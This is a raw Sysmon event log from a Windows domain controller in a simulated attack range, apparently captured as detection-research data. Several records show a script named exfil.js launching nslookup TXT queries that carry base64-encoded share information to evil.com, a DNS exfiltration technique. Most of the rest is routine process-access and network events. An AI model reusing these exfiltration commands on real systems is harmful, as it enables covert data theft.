14:16:06.403{2E1864BB-17A1-629A-783D-000000005F02}55527832C:\Windows\System32\WScript.exe{2E1864BB-17A6-629A-BE3D-000000005F02}3140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.403{2E1864BB-17A6-629A-BE3D-000000005F02}3140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlquwl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.400{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxoo.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.350{2E1864BB-17A6-629A-BC3D-000000005F02}77726076C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-BD3D-000000005F02}5184C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.335{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.319{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.319{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.319{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.319{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-BD3D-000000005F02}5184C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.319{2E1864BB-17A6-629A-BB3D-000000005F02}21727460C:\Windows\system32\cmd.exe{2E1864BB-17A6-629A-BD3D-000000005F02}5184C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.333{2E1864BB-17A6-629A-BD3D-000000005F02}5184C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A6-629A-BB3D-000000005F02}2172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxoo.tmp 2>&1 354300x8000000000000000194306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52106- 354300x8000000000000000194305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.862{00000000-0000-0000-0000-000000000000}7392<unknown process>-udptruefalse127.0.0.1-52106-false127.0.0.1-53domain 354300x8000000000000000194304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.757{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52105- 354300x8000000000000000194303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.757{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52104- 354300x8000000000000000194302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.757{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52103- 354300x8000000000000000194301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.756{00000000-0000-0000-0000-000000000000}5040<unknown process>-udptruefalse127.0.0.1-52103-false127.0.0.1-53domain 10341000x8000000000000000194300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.282{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-BC3D-000000005F02}7772C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.282{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-BC3D-000000005F02}7772C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000194298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.267{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB71C6914034CC78BC194061917F754,SHA256=3424D40AE130D7E8F6108C203ED0E45D41F81FBDBFDE3B54F5168591623F63E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.267{2E1864BB-17A6-629A-BC3D-000000005F02}77726076C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-BB3D-000000005F02}2172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.250{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-BC3D-000000005F02}7772C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.235{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.235{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.219{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-BB3D-000000005F02}2172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.219{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.219{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.219{2E1864BB-17A1-629A-783D-000000005F02}55528092C:\Windows\System32\WScript.exe{2E1864BB-17A6-629A-BB3D-000000005F02}2172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.230{2E1864BB-17A6-629A-BB3D-000000005F02}2172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxoo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.204{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljakat.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.151{2E1864BB-17A6-629A-B93D-000000005F02}1788508C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-BA3D-000000005F02}3348C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.135{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.135{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.135{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.135{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 